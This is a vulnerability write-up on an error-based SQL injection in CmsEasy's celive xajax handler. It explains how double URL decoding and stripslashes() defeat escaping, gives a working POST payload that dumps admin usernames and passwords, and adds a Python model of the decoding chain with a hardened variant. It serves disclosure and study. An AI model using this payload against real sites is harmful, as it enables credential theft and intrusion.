### Brief description: CmsEasy unrestricted error-based SQL injection (exp can dump site-wide data)

### Detailed description:

The problem is again in celive, but unlike the earlier issues it arises in the handling of `xjxquery`. Look at the code in xajax.class.php:

```php
if ($rootTag == "xjxquery") {
    $sQuery = "";
    $this->iPos++;
    while (!stristr($this->aObjArray[$this->iPos], "</xjxquery>")) {
        if (stristr($this->aObjArray[$this->iPos], "<q>") || stristr($this->aObjArray[$this->iPos], "</q>")) {
            $this->iPos++;
            continue;
        }
        $sQuery .= $this->aObjArray[$this->iPos];
        $this->iPos++;
    }
    parse_str($sQuery, $aArray);
    if ($this->bDecodeUTF8Input) {
        foreach ($aArray as $key => $value) {
            $aArray[$key] = $this->_decodeUTF8Data($value);
        }
    }
    if (get_magic_quotes_gpc() == 1) {
        $newArray = array();
        foreach ($aArray as $sKey => $sValue) {
            if (is_string($sValue))
                $newArray[$sKey] = stripslashes($sValue);
            else
                $newArray[$sKey] = $sValue;
        }
        $aArray = $newArray;
    }
}
return $aArray;
}
```

Where the problem is: `parse_str($sQuery, $aArray);`. This function performs a round of URL decoding of its own, on top of the decoding PHP already applied when it populated `$_POST`. A quick test:

```php
<?php
// $_GET['b'] has already been URL-decoded once by PHP; parse_str()
// decodes it a second time. (The original test used the one-argument
// form, which registers variables directly; it was removed in PHP 8.)
echo $_GET['b'];
echo " ";
parse_str($_GET['b'], $vars);
echo $vars['a'];
?>
```

![1.png](https://images.seebug.org/upload/201508/26090436e3ebc6d9b0b2608c691b30b4744c8aae.png)

Confirmed.

The second piece of logic: if magic_quotes_gpc is on, it runs stripslashes() on every value, which undoes the escaping magic quotes added:

```php
if (get_magic_quotes_gpc() == 1) {
    $newArray = array();
    foreach ($aArray as $sKey => $sValue) {
        if (is_string($sValue))
            $newArray[$sKey] = stripslashes($sValue);
```

As before, two of the registered xajax functions can be reached from the front end: Postdata and LiveMessage. Look at LiveMessage:

```php
function LiveMessage($a) {
    global $db;
    $sessionid = $_SESSION['sessionid'];
    $name = addslashes(htmlspecialchars($a['name']));
    $email = addslashes(htmlspecialchars($a['email']));
    $country = addslashes(htmlspecialchars($a['country']));
    $phone = addslashes(htmlspecialchars($a['phone']));
    $departmentid = addslashes(htmlspecialchars($a['departmentid']));
    $message = addslashes(htmlspecialchars($a['message']));
```

Every parameter goes through addslashes(). Now look at Postdata:

```php
function Postdata($a) {
    global $db;
    $chatid = $_SESSION['chatid'];
    $name = $_SESSION['name'];
    $a['detail'] = htmlspecialchars($a['detail']);
    if (!get_magic_quotes_gpc()) {
        $a['detail'] = addslashes($a['detail']);
    }
```

When magic_quotes_gpc is on, Postdata does not call addslashes() at all; it trusts the escaping magic quotes applied to the request. But that escaping has already been removed by the stripslashes() loop above, and a double-encoded quote (`%2527`) is still `%27` when magic quotes run, so nothing is escaped in the first place; parse_str() only turns it into a literal `'` afterwards. htmlspecialchars() with its default flags does not touch the single quote either. Straight to the exp.

Send to URL: http://localhost/Cmseasy/celive/live/header.php

POST data:

```
xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail=xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527%257C%2527%252Cpassword%2529%2529%2520from%2520cmseasy_user%2529%252C1%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%252CNULL%2529--%2520</q></xjxquery>
```

![2.png](https://images.seebug.org/upload/201508/2609100916fa57cd969ddf1cec6343a368635202.png)

### Proof of vulnerability:
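To check the decoding chain described above offline, here is an added example written for this page (it is not code from CmsEasy, celive or the xajax library). It models the three stages in Python: PHP populating `$_POST` with magic_quotes_gpc, the `xjxquery` branch's parse_str() and stripslashes(), and Postdata()'s conditional addslashes(). PHP's addslashes(), stripslashes() and htmlspecialchars() (pre-8.1 default ENT_COMPAT) are re-implemented here; the xjxquery tokenizer is reduced to a regex; the request body and all function names are constructed. It goes beyond the report in that it runs the raw quote, the single-encoded and the double-encoded form under both magic-quote settings, and adds a hypothetical hardened Postdata that escapes once after every decoding step.

```python
"""Model of the celive/xajax decoding chain (added example, not CmsEasy code)."""
import html
import re
from urllib.parse import parse_qs

# The double-encoded `detail` value from the report, verbatim.
PAGE_PAYLOAD = (
    "xxxxxx%2527%252C%2528UpdateXML%25281%252CCONCAT%25280x5b%252Cmid%2528%2528"
    "SELECT%252f%252a%252a%252fGROUP_CONCAT%2528concat%2528username%252C%2527"
    "%257C%2527%252Cpassword%2529%2529%2520from%2520cmseasy_user%2529%252C1"
    "%252C32%2529%252C0x5d%2529%252C1%2529%2529%252CNULL%252CNULL%252CNULL"
    "%252CNULL%252CNULL%252CNULL%2529--%2520"
)


def php_addslashes(s: str) -> str:
    """PHP addslashes(): backslash-escape ' " \\ and NUL."""
    out = []
    for ch in s:
        if ch in "'\"\\":
            out.append("\\" + ch)
        elif ch == "\x00":
            out.append("\\0")
        else:
            out.append(ch)
    return "".join(out)


def php_stripslashes(s: str) -> str:
    """PHP stripslashes(): remove one level of backslashes (\\0 -> NUL)."""
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\":
            if i + 1 < len(s):
                out.append("\x00" if s[i + 1] == "0" else s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def php_htmlspecialchars(s: str) -> str:
    """htmlspecialchars() with the old default ENT_COMPAT: & < > and the
    double quote are escaped, the single quote is left alone."""
    return html.escape(s, quote=False).replace('"', "&quot;")


def build_body(detail_on_wire: str) -> str:
    """Constructed POST body in the shape the report sends to celive/live/header.php."""
    return ("xajax=Postdata&xajaxargs[0]=<xjxquery><q>detail="
            + detail_on_wire + "</q></xjxquery>")


def php_populate_post(body: str, magic_quotes: bool) -> dict:
    """Stage 1: PHP URL-decodes the body once into $_POST; with
    magic_quotes_gpc on, every value is then passed through addslashes()."""
    post = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if magic_quotes:
        post = {k: php_addslashes(v) for k, v in post.items()}
    return post


def xajax_xjxquery(arg: str, magic_quotes: bool) -> dict:
    """Stage 2: the xjxquery branch of xajax.class.php, simplified.  The
    text between <q> and </q> goes through parse_str(), i.e. a SECOND URL
    decode; with magic quotes on, every value is then stripslashes()'d."""
    m = re.search(r"<xjxquery><q>(.*)</q></xjxquery>", arg, re.S)
    query = m.group(1) if m else ""
    arr = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    if magic_quotes:
        arr = {k: php_stripslashes(v) for k, v in arr.items()}
    return arr


def celive_postdata(a: dict, magic_quotes: bool) -> str:
    """Stage 3: Postdata() as shown in the report: htmlspecialchars(), then
    addslashes() only when magic_quotes_gpc is OFF."""
    detail = php_htmlspecialchars(a.get("detail", ""))
    if not magic_quotes:
        detail = php_addslashes(detail)
    return detail


def celive_postdata_fixed(a: dict) -> str:
    """Hypothetical hardened Postdata: escape exactly once, after all decoding,
    regardless of magic_quotes_gpc (a bound parameter would be better still)."""
    return php_addslashes(php_htmlspecialchars(a.get("detail", "")))


def sql_sees(detail_on_wire: str, magic_quotes: bool) -> str:
    """Value of `detail` as it reaches the SQL statement in the vulnerable code."""
    post = php_populate_post(build_body(detail_on_wire), magic_quotes)
    args = xajax_xjxquery(post["xajaxargs[0]"], magic_quotes)
    return celive_postdata(args, magic_quotes)


def sql_sees_fixed(detail_on_wire: str, magic_quotes: bool) -> str:
    """Same chain, but with the hardened Postdata at the end."""
    post = php_populate_post(build_body(detail_on_wire), magic_quotes)
    args = xajax_xjxquery(post["xajaxargs[0]"], magic_quotes)
    return celive_postdata_fixed(args)


if __name__ == "__main__":
    for wire in ("xxx'", "xxx%27", "xxx%2527"):
        for mq in (True, False):
            print(f"{wire:10} magic_quotes={mq!s:5} -> {sql_sees(wire, mq)!r}")
    print(sql_sees(PAGE_PAYLOAD, True))
```

Running it prints the value that reaches the SQL statement for each case. With magic_quotes_gpc on, the quote arrives unescaped in every encoding, because stripslashes() undoes whatever magic quotes added and Postdata() then adds nothing; with it off, Postdata()'s addslashes() neutralises all three forms, which is why the report ties the exp to the magic-quotes setting. The hardened variant escapes in both settings; binding the value as a query parameter would remove the dependence on escaping altogether.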